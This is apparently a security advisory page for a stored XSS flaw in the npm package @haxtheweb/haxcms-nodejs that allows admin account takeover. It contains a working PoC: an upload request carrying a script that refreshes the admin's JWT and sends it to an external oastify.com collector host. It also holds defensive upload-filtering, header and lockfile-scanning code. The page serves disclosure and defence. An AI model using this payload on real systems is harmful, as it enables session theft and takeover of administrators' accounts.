npm · GHSA-3fm2-xfq7-7778 · HIGH

HAXcms Has Stored XSS Vulnerability that May Lead to Account Takeover

Also known as: CVE-2026-22704
Published: Jan 13, 2026
Updated: Feb 3, 2026
Affected: 1 package
Patched: 1 / 1
Exploits: 1 known

EPSS Exploitation Probability (via FIRST.org)

1.0% probability of exploitation in next 30 days
Lower Risk: 59th percentile (+0.95%)
[EPSS trend chart: probability over time, Feb 26 to Jun 26]

EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.

Blast Radius

1 pkg affected

Weekly download volume for affected packages — a proxy for how broadly this vulnerability is deployed.

@haxtheweb/haxcms-nodejs (npm): 142 downloads / week

Description

Summary

Stored XSS Leading to Account Takeover

Details

The Exploit Chain:

1. Upload: The attacker uploads an .html file containing a JavaScript payload.
2. Execution: A logged-in administrator is tricked into visiting the URL of this uploaded file.
3. Token Refresh: The JavaScript payload makes a fetch request to the /system/api/refreshAccessToken endpoint. Because the administrator is logged in, their browser automatically attaches the haxcms_refresh_token cookie to this request.
4. JWT Theft: The server validates the refresh token and responds with a new, valid JWT access token in the JSON response.
5. Exfiltration: The JavaScript captures this new JWT from the response and sends it to an attacker-controlled server.
6. Account Takeover: The attacker now possesses a valid administrator JWT and can take full control of the application.

Vulnerability recurrence:

<img width="1198" height="756" alt="image" src="https://github.com/user-attachments/assets/7062d542-702e-4cbe-8493-da0f71e790c3" />

Then we test access to this HTML file:

<img width="1433" height="1019" alt="image" src="https://github.com/user-attachments/assets/6c72c92f-a151-4b0e-b6ba-d83ffb771253" />

You can obtain other people's identity information:

<img width="1082" height="290" alt="image" src="https://github.com/user-attachments/assets/23398ea4-f08c-47bd-b2f1-89071af0e275" />

PoC

POST /system/api/saveFile?siteName=yu&site_token=neWmRyvNbCCwiQ7MP2ojAjVMk-HtjlKYNOqsQjLt3RQ&jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6IlVqUzd6NFRFano1Q2xUMERiNnU0RmFROWJZSXgyMjd5OHN2NzRWb1hLbFkiLCJpYXQiOjE3NTUyNDYxODYsImV4cCI6MTc1NTI0NzA4NiwidXNlciI6ImFkbWluIn0.XrXr427aKbyw97aDjD2OX128DznGtw_CHMALAeodb0M HTTP/1.1
Host: 192.168.1.72:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Connection: close
Content-Length: 1128

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="bulk-import"

true
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="file-upload"; filename="files/pwn1116.html"
Content-Type: text/plain

<script>
// This version adds headers to make the request look more legitimate.
fetch('/system/api/refreshAccessToken', {
  method: 'POST',
  headers: { 'Content-Type': 'application/json' },
  body: '{}' // Sending an empty JSON object body
})
.then(response => {
  if (!response.ok) {
    throw new Error('Network response was not ok ' + response.statusText);
  }
  return response.json();
})
.then(data => {
  var stolenJWT = data.jwt;
  var attackerUrl = 'https://zqtqii0n7ptm168btd4htrntrkxbl29r.oastify.com/log?jwt=' + stolenJWT;
  fetch(attackerUrl);
})
.catch(error => {
  var attackerUrl = 'https://zqtqii0n7ptm168btd4htrntrkxbl29r.oastify.com/log?error=' + error.message;
  fetch(attackerUrl);
});
</script>
<h1>Processing your request...</h1>
------WebKitFormBoundary7MA4YWxkTrZu0gW--

Impact

The attacker now possesses a valid administrator JWT and can take full control of the application.
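The chain above works because an uploaded .html file is served as a page on the application's own origin. That detail decides which defences help: SameSite cookie attributes and CSRF tokens on /system/api/refreshAccessToken do not stop it, since the payload's fetch is a same-origin request and the browser attaches haxcms_refresh_token as it would for any first-party page. The durable fix is to never let an uploaded file render as active content on that origin. The following Node.js snippet is an added defensive example, not HAXcms code or the fix shipped in 25.0.0; the function names, the rejection policy and the sample uploads are this example's own assumptions. It rejects uploads that would execute in a browser (by extension and by sniffing the body, because the PoC declared text/plain for an .html file), and it builds the response headers with which any user upload should be served so that even a file that slips through is downloaded rather than rendered.

```javascript
// Added example (not HAXcms code): upload policy and inert serving headers
// for user-supplied files. Names and policy are this example's assumptions.

const ACTIVE_EXTENSIONS = new Set(['html', 'htm', 'xhtml', 'shtml', 'svg', 'xml']);

// Markup that identifies HTML no matter what Content-Type the client declared.
const HTML_MARKERS = ['<script', '<html', '<!doctype html', '<svg', '<iframe',
                      '<body', '<object', '<embed'];

function extensionOf(filename) {
  const base = filename.split('/').pop().split('\\').pop();
  const dot = base.lastIndexOf('.');
  return dot === -1 ? '' : base.slice(dot + 1).toLowerCase();
}

function looksLikeHtml(bytes) {
  // Inspect the first 1 KiB, case-insensitively; leading markup is enough.
  const head = Buffer.from(bytes).subarray(0, 1024).toString('latin1').toLowerCase();
  return HTML_MARKERS.some(marker => head.includes(marker));
}

// Returns { allowed, reason }. The declared type is logged, never trusted.
function checkUpload(filename, declaredType, bytes) {
  if (filename.includes('..') || filename.startsWith('/')) {
    return { allowed: false, reason: 'path traversal in filename' };
  }
  const ext = extensionOf(filename);
  if (ACTIVE_EXTENSIONS.has(ext)) {
    return { allowed: false, reason: `extension .${ext} can execute script in a browser` };
  }
  if (looksLikeHtml(bytes)) {
    return { allowed: false, reason: `body contains HTML markup despite declared type ${declaredType}` };
  }
  return { allowed: true, reason: 'ok' };
}

// Headers for serving any stored upload: force a download, forbid MIME
// sniffing, and apply a sandboxed CSP so that even rendered content gets
// no script execution and no access to the origin's cookies.
function uploadResponseHeaders(filename) {
  const safeName = filename.replace(/[^\w.\-]/g, '_');
  return {
    'Content-Type': 'application/octet-stream',
    'Content-Disposition': `attachment; filename="${safeName}"`,
    'X-Content-Type-Options': 'nosniff',
    'Content-Security-Policy': "sandbox; default-src 'none'",
    'Cache-Control': 'no-store',
  };
}

// Constructed sample uploads modelled on the advisory's PoC (not its data).
const samples = [
  ['files/pwn1116.html', 'text/plain', '<script>fetch("/system/api/refreshAccessToken")</script>'],
  ['notes.txt', 'text/plain', '<!DOCTYPE html><body>hi</body>'],
  ['report.pdf', 'application/pdf', '%PDF-1.4 ...'],
];
for (const [name, type, body] of samples) {
  console.log(name, checkUpload(name, type, Buffer.from(body)));
}
console.log(uploadResponseHeaders('files/pwn1116.html'));
```

Serving uploads from a separate, cookie-less origin (a dedicated static host) is the stronger structural version of the same idea; the headers above are the minimum when that is not an option.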

Affected Packages

1 total, 1 fixed

Ecosystem   Package                     Vulnerable range         Fix
npm         @haxtheweb/haxcms-nodejs    >= 11.0.6 && < 25.0.0    25.0.0
Exploits & PoCs (1)

Research use only. For defensive security, authorized penetration testing, and academic research only. Never execute exploit code against systems without explicit written authorization.

EDB-52526 · webapps · multiple

HAX CMS 24.x - Stored Cross-Site Scripting (XSS)

by banyamer · Apr 29, 2026

Detection & mitigation playbook

Open-source dependency
  1. Detect

    Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for @haxtheweb/haxcms-nodejs. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

  2. Fix

    Update @haxtheweb/haxcms-nodejs to 25.0.0 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-3fm2-xfq7-7778 is resolved across your whole dependency graph.

  3. Workarounds

    If you can't upgrade right away: gate or disable the affected feature (here, the file upload endpoint, or at least the serving of uploaded .html files from the application's own origin), validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

  4. How O3 protects you

    O3 pinpoints whether GHSA-3fm2-xfq7-7778 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-3fm2-xfq7-7778. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
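The Detect and Fix steps above come down to one check: is any installed copy of @haxtheweb/haxcms-nodejs, direct or nested, inside the advisory's vulnerable range? The following Node.js script is an added example of that check, not O3's tooling and not a HAXcms project file. It reads a package-lock.json (the v2/v3 "packages" map, with a fallback for the v1 "dependencies" tree), collects every installed path of the package, and compares each version against the range from the Affected Packages table. The semver comparison is this example's own minimal implementation for x.y.z versions with an optional pre-release suffix; the lockfile fragment is constructed for illustration.

```javascript
// Added example (not O3's tooling): find vulnerable copies of the advisory's
// package in a parsed package-lock.json. Range taken from the advisory above.

const ADVISORY = {
  id: 'GHSA-3fm2-xfq7-7778',
  pkg: '@haxtheweb/haxcms-nodejs',
  introduced: '11.0.6', // inclusive
  fixed: '25.0.0',      // exclusive
};

function parseVersion(v) {
  const dash = v.indexOf('-');
  const core = dash === -1 ? v : v.slice(0, dash);
  const pre = dash === -1 ? null : v.slice(dash + 1);
  return { nums: core.split('.').map(Number), pre };
}

// Returns -1, 0 or 1. A pre-release sorts before the same release version.
function compareVersions(a, b) {
  const pa = parseVersion(a), pb = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    const d = (pa.nums[i] || 0) - (pb.nums[i] || 0);
    if (d !== 0) return d < 0 ? -1 : 1;
  }
  if (pa.pre && !pb.pre) return -1;
  if (!pa.pre && pb.pre) return 1;
  return 0;
}

function isVulnerable(version) {
  return compareVersions(version, ADVISORY.introduced) >= 0 &&
         compareVersions(version, ADVISORY.fixed) < 0;
}

// Every installed path of the package, including nested (transitive) copies
// that a direct upgrade would leave behind.
function installedVersions(lock) {
  const found = [];
  if (lock.packages) {
    for (const [path, meta] of Object.entries(lock.packages)) {
      if (path.endsWith('node_modules/' + ADVISORY.pkg) && meta.version) {
        found.push({ path, version: meta.version });
      }
    }
  } else if (lock.dependencies) {
    const walk = (deps, prefix) => {
      for (const [name, meta] of Object.entries(deps)) {
        const path = prefix + 'node_modules/' + name;
        if (name === ADVISORY.pkg && meta.version) found.push({ path, version: meta.version });
        if (meta.dependencies) walk(meta.dependencies, path + '/');
      }
    };
    walk(lock.dependencies, '');
  }
  return found;
}

function scanLockfile(lock) {
  return installedVersions(lock).map(e => ({ ...e, vulnerable: isVulnerable(e.version) }));
}

// Constructed lockfile fragment: a vulnerable direct copy and a patched copy
// nested under a plugin. Not a real project's lockfile.
const sampleLock = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-site', version: '1.0.0' },
    'node_modules/@haxtheweb/haxcms-nodejs': { version: '24.0.3' },
    'node_modules/some-plugin': { version: '2.1.0' },
    'node_modules/some-plugin/node_modules/@haxtheweb/haxcms-nodejs': { version: '25.0.0' },
  },
};

for (const r of scanLockfile(sampleLock)) {
  console.log(`${r.path}@${r.version}: ${r.vulnerable ? 'VULNERABLE (' + ADVISORY.id + ')' : 'ok'}`);
}
```

To run it against a real project, replace sampleLock with JSON.parse(require('fs').readFileSync('package-lock.json', 'utf8')); a clean result means no installed path is in range, which is the condition the Fix step asks you to confirm across the whole dependency graph.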
